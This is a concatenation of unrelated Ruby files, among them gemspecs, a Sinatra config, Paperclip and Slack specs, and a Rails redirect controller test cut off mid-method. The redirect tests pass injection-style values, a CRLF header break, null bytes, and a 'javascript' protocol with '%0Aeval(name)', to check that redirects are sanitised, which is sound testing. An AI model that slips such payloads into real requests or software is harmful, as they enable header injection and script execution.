# stub: github-pages 215 ruby lib
Gem::Specification.new do |s|
s.name = "github-pages".freeze
s.version = "215"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["GitHub, Inc.".freeze]
s.date = "2021-05-24"
s.description = "Bootstrap the GitHub Pages Jekyll environment locally.".freeze
s.email = "[email protected]".freeze
s.executables = ["github-pages".freeze]
s.files = ["bin/github-pages".freeze]
s.homepage = "https://github.com/github/pages-gem".freeze
s.licenses = ["MIT".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.3.0".freeze)
s.rubygems_version = "3.1.2".freeze
s.summary = "Track GitHub Pages dependencies.".freeze
s.installed_by_version = "3.1.2" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<jekyll>.freeze, ["= 3.9.0"])
s.add_runtime_dependency(%q<jekyll-sass-converter>.freeze, ["= 1.5.2"])
s.add_runtime_dependency(%q<kramdown>.freeze, ["= 2.3.1"])
s.add_runtime_dependency(%q<kramdown-parser-gfm>.freeze, ["= 1.1.0"])
s.add_runtime_dependency(%q<jekyll-commonmark-ghpages>.freeze, ["= 0.1.6"])
s.add_runtime_dependency(%q<liquid>.freeze, ["= 4.0.3"])
s.add_runtime_dependency(%q<rouge>.freeze, ["= 3.26.0"])
s.add_runtime_dependency(%q<github-pages-health-check>.freeze, ["= 1.17.2"])
s.add_runtime_dependency(%q<jekyll-redirect-from>.freeze, ["= 0.16.0"])
s.add_runtime_dependency(%q<jekyll-sitemap>.freeze, ["= 1.4.0"])
s.add_runtime_dependency(%q<jekyll-feed>.freeze, ["= 0.15.1"])
s.add_runtime_dependency(%q<jekyll-gist>.freeze, ["= 1.5.0"])
s.add_runtime_dependency(%q<jekyll-paginate>.freeze, ["= 1.1.0"])
s.add_runtime_dependency(%q<jekyll-coffeescript>.freeze, ["= 1.1.1"])
s.add_runtime_dependency(%q<jekyll-seo-tag>.freeze, ["= 2.7.1"])
s.add_runtime_dependency(%q<jekyll-github-metadata>.freeze, ["= 2.13.0"])
s.add_runtime_dependency(%q<jekyll-avatar>.freeze, ["= 0.7.0"])
s.add_runtime_dependency(%q<jekyll-remote-theme>.freeze, ["= 0.4.3"])
s.add_runtime_dependency(%q<jemoji>.freeze, ["= 0.12.0"])
s.add_runtime_dependency(%q<jekyll-mentions>.freeze, ["= 1.6.0"])
s.add_runtime_dependency(%q<jekyll-relative-links>.freeze, ["= 0.6.1"])
s.add_runtime_dependency(%q<jekyll-optional-front-matter>.freeze, ["= 0.3.2"])
s.add_runtime_dependency(%q<jekyll-readme-index>.freeze, ["= 0.3.0"])
s.add_runtime_dependency(%q<jekyll-default-layout>.freeze, ["= 0.1.4"])
s.add_runtime_dependency(%q<jekyll-titles-from-headings>.freeze, ["= 0.5.3"])
s.add_runtime_dependency(%q<jekyll-swiss>.freeze, ["= 1.0.0"])
s.add_runtime_dependency(%q<minima>.freeze, ["= 2.5.1"])
s.add_runtime_dependency(%q<jekyll-theme-primer>.freeze, ["= 0.5.4"])
s.add_runtime_dependency(%q<jekyll-theme-architect>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-cayman>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-dinky>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-hacker>.freeze, ["= 0.1.2"])
s.add_runtime_dependency(%q<jekyll-theme-leap-day>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-merlot>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-midnight>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-minimal>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-modernist>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-slate>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-tactile>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<jekyll-theme-time-machine>.freeze, ["= 0.1.1"])
s.add_runtime_dependency(%q<mercenary>.freeze, ["~> 0.3"])
s.add_runtime_dependency(%q<nokogiri>.freeze, [">= 1.10.4", "< 2.0"])
s.add_runtime_dependency(%q<terminal-table>.freeze, ["~> 1.4"])
s.add_development_dependency(%q<jekyll_test_plugin_malicious>.freeze, ["~> 0.2"])
s.add_development_dependency(%q<pry>.freeze, ["~> 0.10"])
s.add_development_dependency(%q<rspec>.freeze, ["~> 3.3"])
s.add_development_dependency(%q<rubocop-github>.freeze, ["= 0.16.0"])
else
s.add_dependency(%q<jekyll>.freeze, ["= 3.9.0"])
s.add_dependency(%q<jekyll-sass-converter>.freeze, ["= 1.5.2"])
s.add_dependency(%q<kramdown>.freeze, ["= 2.3.1"])
s.add_dependency(%q<kramdown-parser-gfm>.freeze, ["= 1.1.0"])
s.add_dependency(%q<jekyll-commonmark-ghpages>.freeze, ["= 0.1.6"])
s.add_dependency(%q<liquid>.freeze, ["= 4.0.3"])
s.add_dependency(%q<rouge>.freeze, ["= 3.26.0"])
s.add_dependency(%q<github-pages-health-check>.freeze, ["= 1.17.2"])
s.add_dependency(%q<jekyll-redirect-from>.freeze, ["= 0.16.0"])
s.add_dependency(%q<jekyll-sitemap>.freeze, ["= 1.4.0"])
s.add_dependency(%q<jekyll-feed>.freeze, ["= 0.15.1"])
s.add_dependency(%q<jekyll-gist>.freeze, ["= 1.5.0"])
s.add_dependency(%q<jekyll-paginate>.freeze, ["= 1.1.0"])
s.add_dependency(%q<jekyll-coffeescript>.freeze, ["= 1.1.1"])
s.add_dependency(%q<jekyll-seo-tag>.freeze, ["= 2.7.1"])
s.add_dependency(%q<jekyll-github-metadata>.freeze, ["= 2.13.0"])
s.add_dependency(%q<jekyll-avatar>.freeze, ["= 0.7.0"])
s.add_dependency(%q<jekyll-remote-theme>.freeze, ["= 0.4.3"])
s.add_dependency(%q<jemoji>.freeze, ["= 0.12.0"])
s.add_dependency(%q<jekyll-mentions>.freeze, ["= 1.6.0"])
s.add_dependency(%q<jekyll-relative-links>.freeze, ["= 0.6.1"])
s.add_dependency(%q<jekyll-optional-front-matter>.freeze, ["= 0.3.2"])
s.add_dependency(%q<jekyll-readme-index>.freeze, ["= 0.3.0"])
s.add_dependency(%q<jekyll-default-layout>.freeze, ["= 0.1.4"])
s.add_dependency(%q<jekyll-titles-from-headings>.freeze, ["= 0.5.3"])
s.add_dependency(%q<jekyll-swiss>.freeze, ["= 1.0.0"])
s.add_dependency(%q<minima>.freeze, ["= 2.5.1"])
s.add_dependency(%q<jekyll-theme-primer>.freeze, ["= 0.5.4"])
s.add_dependency(%q<jekyll-theme-architect>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-cayman>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-dinky>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-hacker>.freeze, ["= 0.1.2"])
s.add_dependency(%q<jekyll-theme-leap-day>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-merlot>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-midnight>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-minimal>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-modernist>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-slate>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-tactile>.freeze, ["= 0.1.1"])
s.add_dependency(%q<jekyll-theme-time-machine>.freeze, ["= 0.1.1"])
s.add_dependency(%q<mercenary>.freeze, ["~> 0.3"])
s.add_dependency(%q<nokogiri>.freeze, [">= 1.10.4", "< 2.0"])
s.add_dependency(%q<terminal-table>.freeze, ["~> 1.4"])
s.add_dependency(%q<jekyll_test_plugin_malicious>.freeze, ["~> 0.2"])
s.add_dependency(%q<pry>.freeze, ["~> 0.10"])
s.add_dependency(%q<rspec>.freeze, ["~> 3.3"])
s.add_dependency(%q<rubocop-github>.freeze, ["= 0.16.0"])
end
end
| 58.888889 | 112 | 0.660108 |
87f0487378f0ec576495df9c1972666a64fbeb60 | 611 | ENV['SINATRA_ENV'] ||= "development"
require 'bundler/setup'
Bundler.require(:default, ENV['SINATRA_ENV'])
ActiveRecord::Base.establish_connection(
:adapter => "sqlite3",
:database => "db/#{ENV['SINATRA_ENV']}.sqlite"
)
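# In production the connection comes from DATABASE_URL (falling back to a local
# "mydb" Postgres URL); the "postgres" URI scheme is mapped to ActiveRecord's
# "postgresql" adapter and the leading "/" is stripped from the URI path to get
# the database name.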
configure :production do
db = URI.parse(ENV['DATABASE_URL'] || 'postgres://localhost/mydb')
ActiveRecord::Base.establish_connection(
:adapter => db.scheme == 'postgres' ? 'postgresql' : db.scheme,
:host => db.host,
:username => db.user,
:password => db.password,
:database => db.path[1..-1],
:encoding => 'utf8'
)
end
require 'rack-flash'
require_all 'app'
| 23.5 | 67 | 0.664484 |
7a534c90410e79852d4afadb9580b872a8cd440c | 914 | Gem::Specification.new do |s|
s.name = "rack-mini-profiler"
s.version = "0.1.22"
s.summary = "Profiles loading speed for rack applications."
s.authors = ["Sam Saffron", "Robin Ward","Aleks Totic"]
s.description = "Profiling toolkit for Rack applications with Rails integration. Client Side profiling, DB profiling and Server profiling."
s.email = "[email protected]"
s.homepage = "http://miniprofiler.com"
s.files = [
'rack-mini-profiler.gemspec',
].concat( Dir.glob('Ruby/lib/**/*').reject {|f| File.directory?(f) || f =~ /~$/ } )
s.extra_rdoc_files = [
"Ruby/README.md",
"Ruby/CHANGELOG"
]
s.add_runtime_dependency 'rack', '>= 1.1.3'
if RUBY_VERSION < "1.9"
s.add_runtime_dependency 'json', '>= 1.6'
end
s.add_development_dependency 'rake'
s.add_development_dependency 'rack-test'
s.add_development_dependency 'activerecord', '~> 3.0'
s.require_paths = ["Ruby/lib"]
end
| 33.851852 | 140 | 0.68709 |
3393e5a61936cd3f0ef205012bbb7d8f556484ee | 770 | require 'bio-ucsc'
describe "Bio::Ucsc::Hg19::NtSssSnps" do
describe "#find_by_interval" do
context "given range chr1:1-100,000" do
it "returns an array of results" do
Bio::Ucsc::Hg19::DBConnection.default
Bio::Ucsc::Hg19::DBConnection.connect
i = Bio::GenomicInterval.parse("chr1:1-100,000")
r = Bio::Ucsc::Hg19::NtSssSnps.find_all_by_interval(i)
r.should have(5).items
end
it "returns an array of results with column accessors" do
Bio::Ucsc::Hg19::DBConnection.default
Bio::Ucsc::Hg19::DBConnection.connect
i = Bio::GenomicInterval.parse("chr1:1-100,000")
r = Bio::Ucsc::Hg19::NtSssSnps.find_by_interval(i)
r.chrom.should == "chr1"
end
end
end
end
| 30.8 | 63 | 0.637662 |
61ef52dc65d92a00c24be213da3c1e06267a4b91 | 13,566 | require 'test/helper.rb'
class IntegrationTest < Test::Unit::TestCase
context "Many models at once" do
setup do
rebuild_model
@file = File.new(File.join(FIXTURES_DIR, "5k.png"))
300.times do |i|
Dummy.create! :avatar => @file
end
end
should "not exceed the open file limit" do
assert_nothing_raised do
dummies = Dummy.find(:all)
dummies.each { |dummy| dummy.avatar }
end
end
end
context "An attachment" do
setup do
rebuild_model :styles => { :thumb => "50x50#" }
@dummy = Dummy.new
@file = File.new(File.join(File.dirname(__FILE__),
"fixtures",
"5k.png"))
@dummy.avatar = @file
assert @dummy.save
end
should "create its thumbnails properly" do
assert_match /\b50x50\b/, `identify '#{@dummy.avatar.path(:thumb)}'`
end
context "redefining its attachment styles" do
setup do
Dummy.class_eval do
has_attached_file :avatar, :styles => { :thumb => "150x25#" }
end
@d2 = Dummy.find(@dummy.id)
@d2.avatar.reprocess!
@d2.save
end
should "create its thumbnails properly" do
assert_match /\b150x25\b/, `identify '#{@dummy.avatar.path(:thumb)}'`
end
end
end
context "A model with no attachment validation" do
setup do
rebuild_model :styles => { :large => "300x300>",
:medium => "100x100",
:thumb => ["32x32#", :gif] },
:default_style => :medium,
:url => "/:attachment/:class/:style/:id/:basename.:extension",
:path => ":rails_root/tmp/:attachment/:class/:style/:id/:basename.:extension"
@dummy = Dummy.new
end
should "have its definition return false when asked about whiny_thumbnails" do
assert ! Dummy.attachment_definitions[:avatar][:whiny_thumbnails]
end
context "when validates_attachment_thumbnails is called" do
setup do
Dummy.validates_attachment_thumbnails :avatar
end
should "have its definition return true when asked about whiny_thumbnails" do
assert_equal true, Dummy.attachment_definitions[:avatar][:whiny_thumbnails]
end
end
context "redefined to have attachment validations" do
setup do
rebuild_model :styles => { :large => "300x300>",
:medium => "100x100",
:thumb => ["32x32#", :gif] },
:whiny_thumbnails => true,
:default_style => :medium,
:url => "/:attachment/:class/:style/:id/:basename.:extension",
:path => ":rails_root/tmp/:attachment/:class/:style/:id/:basename.:extension"
end
should "have its definition return true when asked about whiny_thumbnails" do
assert_equal true, Dummy.attachment_definitions[:avatar][:whiny_thumbnails]
end
end
end
context "A model with no thumbnail_convert_options setting" do
setup do
rebuild_model :styles => { :large => "300x300>",
:medium => "100x100",
:thumb => ["32x32#", :gif] },
:default_style => :medium,
:url => "/:attachment/:class/:style/:id/:basename.:extension",
:path => ":rails_root/tmp/:attachment/:class/:style/:id/:basename.:extension"
@dummy = Dummy.new
end
should "have its definition return nil when asked about convert_options" do
assert ! Dummy.attachment_definitions[:avatar][:thumbnail_convert_options]
end
context "redefined to have convert_options setting" do
setup do
rebuild_model :styles => { :large => "300x300>",
:medium => "100x100",
:thumb => ["32x32#", :gif] },
:thumbnail_convert_options => "-strip -depth 8",
:default_style => :medium,
:url => "/:attachment/:class/:style/:id/:basename.:extension",
:path => ":rails_root/tmp/:attachment/:class/:style/:id/:basename.:extension"
end
should "have its definition return convert_options value when asked about convert_options" do
assert_equal "-strip -depth 8", Dummy.attachment_definitions[:avatar][:thumbnail_convert_options]
end
end
end
context "A model with a filesystem attachment" do
setup do
rebuild_model :styles => { :large => "300x300>",
:medium => "100x100",
:thumb => ["32x32#", :gif] },
:whiny_thumbnails => true,
:default_style => :medium,
:url => "/:attachment/:class/:style/:id/:basename.:extension",
:path => ":rails_root/tmp/:attachment/:class/:style/:id/:basename.:extension"
@dummy = Dummy.new
@file = File.new(File.join(FIXTURES_DIR, "5k.png"))
@bad_file = File.new(File.join(FIXTURES_DIR, "bad.png"))
assert @dummy.avatar = @file
assert @dummy.valid?
assert @dummy.save
end
should "write and delete its files" do
[["434x66", :original],
["300x46", :large],
["100x15", :medium],
["32x32", :thumb]].each do |geo, style|
cmd = %Q[identify -format "%wx%h" #{@dummy.avatar.to_file(style).path}]
assert_equal geo, `#{cmd}`.chomp, cmd
end
saved_paths = [:thumb, :medium, :large, :original].collect{|s| @dummy.avatar.to_file(s).path }
@d2 = Dummy.find(@dummy.id)
assert_equal "100x15", `identify -format "%wx%h" #{@d2.avatar.to_file.path}`.chomp
assert_equal "434x66", `identify -format "%wx%h" #{@d2.avatar.to_file(:original).path}`.chomp
assert_equal "300x46", `identify -format "%wx%h" #{@d2.avatar.to_file(:large).path}`.chomp
assert_equal "100x15", `identify -format "%wx%h" #{@d2.avatar.to_file(:medium).path}`.chomp
assert_equal "32x32", `identify -format "%wx%h" #{@d2.avatar.to_file(:thumb).path}`.chomp
@dummy.avatar = "not a valid file but not nil"
assert_equal File.basename(@file.path), @dummy.avatar_file_name
assert @dummy.valid?
assert @dummy.save
saved_paths.each do |p|
assert File.exists?(p)
end
@dummy.avatar = nil
assert_nil @dummy.avatar_file_name
assert @dummy.valid?
assert @dummy.save
saved_paths.each do |p|
assert ! File.exists?(p)
end
@d2 = Dummy.find(@dummy.id)
assert_nil @d2.avatar_file_name
end
should "work exactly the same when new as when reloaded" do
@d2 = Dummy.find(@dummy.id)
assert_equal @dummy.avatar_file_name, @d2.avatar_file_name
[:thumb, :medium, :large, :original].each do |style|
assert_equal @dummy.avatar.to_file(style).path, @d2.avatar.to_file(style).path
end
saved_paths = [:thumb, :medium, :large, :original].collect{|s| @dummy.avatar.to_file(s).path }
@d2.avatar = nil
assert @d2.save
saved_paths.each do |p|
assert ! File.exists?(p)
end
end
should "know the difference between good files, bad files, not files, and nil" do
expected = @dummy.avatar.to_file
@dummy.avatar = "not a file"
assert @dummy.valid?
assert_equal expected.path, @dummy.avatar.to_file.path
@dummy.avatar = @bad_file
assert ! @dummy.valid?
@dummy.avatar = nil
assert @dummy.valid?
end
should "know the difference between good files, bad files, not files, and nil when validating" do
Dummy.validates_attachment_presence :avatar
@d2 = Dummy.find(@dummy.id)
@d2.avatar = @file
assert @d2.valid?
@d2.avatar = @bad_file
assert ! @d2.valid?
@d2.avatar = nil
assert ! @d2.valid?
end
should "be able to reload without saving and not have the file disappear" do
@dummy.avatar = @file
assert @dummy.save
@dummy.avatar = nil
assert_nil @dummy.avatar_file_name
@dummy.reload
assert_equal "5k.png", @dummy.avatar_file_name
end
context "that is assigned its file from another Paperclip attachment" do
setup do
@dummy2 = Dummy.new
@file2 = File.new(File.join(FIXTURES_DIR, "12k.png"))
assert @dummy2.avatar = @file2
@dummy2.save
end
should "work when assigned a file" do
assert_not_equal `identify -format "%wx%h" #{@dummy.avatar.to_file(:original).path}`,
`identify -format "%wx%h" #{@dummy2.avatar.to_file(:original).path}`
assert @dummy.avatar = @dummy2.avatar
@dummy.save
assert_equal `identify -format "%wx%h" #{@dummy.avatar.to_file(:original).path}`,
`identify -format "%wx%h" #{@dummy2.avatar.to_file(:original).path}`
end
should "work when assigned a nil file" do
@dummy2.avatar = nil
@dummy2.save
@dummy.avatar = @dummy2.avatar
@dummy.save
      assert !@dummy.avatar?
end
end
end
if ENV['S3_TEST_BUCKET']
def s3_files_for attachment
[:thumb, :medium, :large, :original].inject({}) do |files, style|
data = `curl '#{attachment.url(style)}' 2>/dev/null`.chomp
t = Tempfile.new("paperclip-test")
t.write(data)
t.rewind
files[style] = t
files
end
end
context "A model with an S3 attachment" do
setup do
rebuild_model :styles => { :large => "300x300>",
:medium => "100x100",
:thumb => ["32x32#", :gif] },
:storage => :s3,
:whiny_thumbnails => true,
# :s3_options => {:logger => Logger.new(StringIO.new)},
:s3_credentials => File.new(File.join(File.dirname(__FILE__), "s3.yml")),
:default_style => :medium,
:bucket => ENV['S3_TEST_BUCKET'],
:path => ":class/:attachment/:id/:style/:basename.:extension"
@dummy = Dummy.new
@file = File.new(File.join(FIXTURES_DIR, "5k.png"))
@bad_file = File.new(File.join(FIXTURES_DIR, "bad.png"))
assert @dummy.avatar = @file
assert @dummy.valid?
assert @dummy.save
@files_on_s3 = s3_files_for @dummy.avatar
end
should "write and delete its files" do
[["434x66", :original],
["300x46", :large],
["100x15", :medium],
["32x32", :thumb]].each do |geo, style|
cmd = %Q[identify -format "%wx%h" #{@files_on_s3[style].path}]
assert_equal geo, `#{cmd}`.chomp, cmd
end
@d2 = Dummy.find(@dummy.id)
@d2_files = s3_files_for @d2.avatar
[["434x66", :original],
["300x46", :large],
["100x15", :medium],
["32x32", :thumb]].each do |geo, style|
cmd = %Q[identify -format "%wx%h" #{@d2_files[style].path}]
assert_equal geo, `#{cmd}`.chomp, cmd
end
@dummy.avatar = "not a valid file but not nil"
assert_equal File.basename(@file.path), @dummy.avatar_file_name
assert @dummy.valid?
assert @dummy.save
saved_keys = [:thumb, :medium, :large, :original].collect{|s| @dummy.avatar.to_file(s) }
saved_keys.each do |key|
assert key.exists?
end
@dummy.avatar = nil
assert_nil @dummy.avatar_file_name
assert @dummy.valid?
assert @dummy.save
saved_keys.each do |key|
assert ! key.exists?
end
@d2 = Dummy.find(@dummy.id)
assert_nil @d2.avatar_file_name
end
should "work exactly the same when new as when reloaded" do
@d2 = Dummy.find(@dummy.id)
assert_equal @dummy.avatar_file_name, @d2.avatar_file_name
[:thumb, :medium, :large, :original].each do |style|
assert_equal @dummy.avatar.to_file(style).to_s, @d2.avatar.to_file(style).to_s
end
saved_keys = [:thumb, :medium, :large, :original].collect{|s| @dummy.avatar.to_file(s) }
@d2.avatar = nil
assert @d2.save
saved_keys.each do |key|
assert ! key.exists?
end
end
should "know the difference between good files, bad files, not files, and nil" do
expected = @dummy.avatar.to_file
@dummy.avatar = "not a file"
assert @dummy.valid?
assert_equal expected.full_name, @dummy.avatar.to_file.full_name
@dummy.avatar = @bad_file
assert ! @dummy.valid?
@dummy.avatar = nil
assert @dummy.valid?
Dummy.validates_attachment_presence :avatar
@d2 = Dummy.find(@dummy.id)
@d2.avatar = @file
assert @d2.valid?
@d2.avatar = @bad_file
assert ! @d2.valid?
@d2.avatar = nil
assert ! @d2.valid?
end
should "be able to reload without saving and not have the file disappear" do
@dummy.avatar = @file
assert @dummy.save
@dummy.avatar = nil
assert_nil @dummy.avatar_file_name
@dummy.reload
assert_equal "5k.png", @dummy.avatar_file_name
end
end
end
end
| 34.431472 | 105 | 0.567153 |
010c94cb91b8730668f83c0e54dd1978976e56bc | 1,374 | #!/usr/bin/env ruby
# Copyright 2018 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
this_dir = File.expand_path(File.dirname(__FILE__))
grpc_lib_dir = File.join(File.dirname(this_dir), 'lib')
$LOAD_PATH.unshift(grpc_lib_dir) unless $LOAD_PATH.include?(grpc_lib_dir)
def main
fail('GRPC constant loaded before expected') if Object.const_defined?(:GRPC)
require 'grpc/core/status_codes'
fail('GRPC constant not loaded when expected') unless Object.const_defined?(:GRPC)
fail('GRPC Core not loaded after required') unless GRPC.const_defined?(:Core)
fail('GRPC StatusCodes not loaded after required') unless GRPC::Core.const_defined?(:StatusCodes)
fail('GRPC library loaded before required') if GRPC::Core.const_defined?(:Channel)
require 'grpc'
fail('GRPC library not loaded after required') unless GRPC::Core.const_defined?(:Channel)
end
main
| 41.636364 | 99 | 0.767103 |
79767a5ec00a93ed61727a50a2b85d1a5bd96b70 | 279 | class ChildrenInHomeForm < Form
set_attributes_for :navigator, :children_in_home
def save
interview.navigator.update(attributes_for(:navigator))
end
def self.existing_attributes(interview)
HashWithIndifferentAccess.new(interview.navigator.attributes)
end
end
| 23.25 | 65 | 0.802867 |
e99fcea68d05ea0ed7a6cb4e15562bfa1e36f259 | 1,241 | require "spec_helper"
describe Slack::ModalPublisher do
before do
allow(STDOUT).to receive(:puts)
end
describe "publish_profile_modal_404" do
let(:subject) {
VCR.use_cassette("slack/publish_profile_modal_404") do
described_class.publish_profile_modal_404("trigger")
end
}
it "should return true" do
expect(subject).to be true
end
end
describe "publish_profile_modal" do
let(:user) { create_user("42", slack_user_id: "U4SPRR1J8") }
let(:user_profile) do
{
'first_name' => user.first_name,
'last_name' => user.last_name,
'avatar' => "http://refuge.la-cordee.net/avatar.jpg",
'tags' => ['cuisine'],
'description' => 'lorem ipsum',
'description_1' => 'lorem ipsum',
'description_2' => 'lorem ipsum',
'description_3' => 'lorem ipsum',
'description_4' => 'lorem ipsum',
'home' => 'Nantes',
'created_at' => Time.now
}
end
let(:subject) {
VCR.use_cassette("slack/publish_profile_modal") do
described_class.publish_profile_modal(user, user_profile, "trigger")
end
}
it "should return true" do
expect(subject).to be true
end
end
end | 25.326531 | 76 | 0.614021 |
033a42a8176a824c00e54ee8b1c90f9031416c38 | 267 | class CreateProgramStudentAssignments < ActiveRecord::Migration[5.0]
def change
create_table :program_student_assignments do |t|
t.references :student, foreign_key: true
t.references :program, foreign_key: true
t.timestamps
end
end
end
| 24.272727 | 68 | 0.734082 |
e218ef35e483bd3ca69557d4ffd6e740d305cea1 | 12,723 | # frozen_string_literal: true
require "abstract_unit"
class Workshop
extend ActiveModel::Naming
include ActiveModel::Conversion
OUT_OF_SCOPE_BLOCK = proc do
raise "Not executed in controller's context" unless RedirectController === self
request.original_url
end
attr_accessor :id
def initialize(id)
@id = id
end
def persisted?
id.present?
end
def to_s
id.to_s
end
end
class RedirectController < ActionController::Base
# empty method not used anywhere to ensure methods like
# `status` and `location` aren't called on `redirect_to` calls
def status; raise "Should not be called!"; end
def location; raise "Should not be called!"; end
def simple_redirect
redirect_to action: "hello_world"
end
def redirect_with_status
redirect_to(action: "hello_world", status: 301)
end
def redirect_with_status_hash
redirect_to({ action: "hello_world" }, { status: 301 })
end
def redirect_with_protocol
redirect_to action: "hello_world", protocol: "https"
end
def url_redirect_with_status
redirect_to("http://www.example.com", status: :moved_permanently)
end
def url_redirect_with_status_hash
redirect_to("http://www.example.com", status: 301)
end
def relative_url_redirect_with_status
redirect_to("/things/stuff", status: :found)
end
def relative_url_redirect_with_status_hash
redirect_to("/things/stuff", status: 301)
end
def redirect_back_with_status
redirect_back(fallback_location: "/things/stuff", status: 307)
end
def redirect_back_with_status_and_fallback_location_to_another_host
redirect_back(fallback_location: "http://www.rubyonrails.org/", status: 307)
end
def safe_redirect_back_with_status
redirect_back(fallback_location: "/things/stuff", status: 307, allow_other_host: false)
end
def safe_redirect_back_with_status_and_fallback_location_to_another_host
redirect_back(fallback_location: "http://www.rubyonrails.org/", status: 307, allow_other_host: false)
end
def host_redirect
redirect_to action: "other_host", only_path: false, host: "other.test.host"
end
def module_redirect
redirect_to controller: "module_test/module_redirect", action: "hello_world"
end
def redirect_to_url
redirect_to "http://www.rubyonrails.org/"
end
def redirect_to_url_with_unescaped_query_string
redirect_to "http://example.com/query?status=new"
end
def redirect_to_url_with_complex_scheme
redirect_to "x-test+scheme.complex:redirect"
end
def redirect_to_url_with_network_path_reference
redirect_to "//www.rubyonrails.org/"
end
def redirect_to_existing_record
redirect_to Workshop.new(5)
end
def redirect_to_new_record
redirect_to Workshop.new(nil)
end
def redirect_to_nil
redirect_to nil
end
def redirect_to_polymorphic
redirect_to [:internal, Workshop.new(5)]
end
def redirect_to_polymorphic_string_args
redirect_to ["internal", Workshop.new(5)]
end
def redirect_to_params
redirect_to ActionController::Parameters.new(status: 200, protocol: "javascript", f: "%0Aeval(name)")
end
def redirect_to_with_block
redirect_to proc { "http://www.rubyonrails.org/" }
end
def redirect_to_with_block_and_assigns
@url = "http://www.rubyonrails.org/"
redirect_to proc { @url }
end
def redirect_to_with_block_and_options
redirect_to proc { { action: "hello_world" } }
end
def redirect_to_out_of_scope_block
redirect_to Workshop::OUT_OF_SCOPE_BLOCK
end
def redirect_with_header_break
redirect_to "/lol\r\nwat"
end
def redirect_with_null_bytes
redirect_to "\000/lol\r\nwat"
end
def rescue_errors(e) raise e end
private
def dashbord_url(id, message)
url_for action: "dashboard", params: { "id" => id, "message" => message }
end
end
class RedirectTest < ActionController::TestCase
tests RedirectController
def test_simple_redirect
get :simple_redirect
assert_response :redirect
assert_equal "http://test.host/redirect/hello_world", redirect_to_url
end
def test_redirect_with_header_break
get :redirect_with_header_break
assert_response :redirect
assert_equal "http://test.host/lolwat", redirect_to_url
end
def test_redirect_with_null_bytes
get :redirect_with_null_bytes
assert_response :redirect
assert_equal "http://test.host/lolwat", redirect_to_url
end
def test_redirect_with_no_status
get :simple_redirect
assert_response 302
assert_equal "http://test.host/redirect/hello_world", redirect_to_url
end
def test_redirect_with_status
get :redirect_with_status
assert_response 301
assert_equal "http://test.host/redirect/hello_world", redirect_to_url
end
def test_redirect_with_status_hash
get :redirect_with_status_hash
assert_response 301
assert_equal "http://test.host/redirect/hello_world", redirect_to_url
end
def test_redirect_with_protocol
get :redirect_with_protocol
assert_response 302
assert_equal "https://test.host/redirect/hello_world", redirect_to_url
end
def test_url_redirect_with_status
get :url_redirect_with_status
assert_response 301
assert_equal "http://www.example.com", redirect_to_url
end
def test_url_redirect_with_status_hash
get :url_redirect_with_status_hash
assert_response 301
assert_equal "http://www.example.com", redirect_to_url
end
def test_relative_url_redirect_with_status
get :relative_url_redirect_with_status
assert_response 302
assert_equal "http://test.host/things/stuff", redirect_to_url
end
def test_relative_url_redirect_with_status_hash
get :relative_url_redirect_with_status_hash
assert_response 301
assert_equal "http://test.host/things/stuff", redirect_to_url
end
def test_relative_url_redirect_host_with_port
request.host = "test.host:1234"
get :relative_url_redirect_with_status
assert_response 302
assert_equal "http://test.host:1234/things/stuff", redirect_to_url
end
def test_simple_redirect_using_options
get :host_redirect
assert_response :redirect
assert_redirected_to action: "other_host", only_path: false, host: "other.test.host"
end
def test_module_redirect
get :module_redirect
assert_response :redirect
assert_redirected_to "http://test.host/module_test/module_redirect/hello_world"
end
def test_module_redirect_using_options
get :module_redirect
assert_response :redirect
assert_redirected_to controller: "module_test/module_redirect", action: "hello_world"
end
def test_redirect_to_url
get :redirect_to_url
assert_response :redirect
assert_redirected_to "http://www.rubyonrails.org/"
end
def test_redirect_to_url_with_unescaped_query_string
get :redirect_to_url_with_unescaped_query_string
assert_response :redirect
assert_redirected_to "http://example.com/query?status=new"
end
def test_redirect_to_url_with_complex_scheme
get :redirect_to_url_with_complex_scheme
assert_response :redirect
assert_equal "x-test+scheme.complex:redirect", redirect_to_url
end
def test_redirect_to_url_with_network_path_reference
get :redirect_to_url_with_network_path_reference
assert_response :redirect
assert_equal "//www.rubyonrails.org/", redirect_to_url
end
def test_redirect_back
referer = "http://www.example.com/coming/from"
@request.env["HTTP_REFERER"] = referer
get :redirect_back_with_status
assert_response 307
assert_equal referer, redirect_to_url
end
def test_redirect_back_with_no_referer
get :redirect_back_with_status
assert_response 307
assert_equal "http://test.host/things/stuff", redirect_to_url
end
def test_redirect_back_with_no_referer_redirects_to_another_host
